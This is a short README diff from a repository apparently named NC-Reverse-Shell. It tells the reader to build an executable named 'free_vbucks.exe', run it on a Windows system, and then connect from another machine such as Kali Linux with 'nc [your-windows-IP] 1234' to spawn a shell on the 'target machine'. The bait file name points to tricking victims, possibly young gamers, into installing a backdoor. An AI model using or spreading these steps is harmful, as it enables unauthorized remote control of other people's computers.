yuuuu7/NC-Reverse-Shell/ReadME.md

 How it works:

-1. Open your code editor (or cmd) and run "python setup.py build" in the terminal
+1. Open your code editor (or cmd) and run "python setup.py build" in the terminal and a "Build" folder should be generated
 2. Open the folder inside the "Build" folder and run the "free_vbucks.exe" in your Windows system
 3. Try "nc [your-windows-IP] 1234" on another machine (i.e. Kali Linux)
 4. You should be able to spawn a shell on your target machine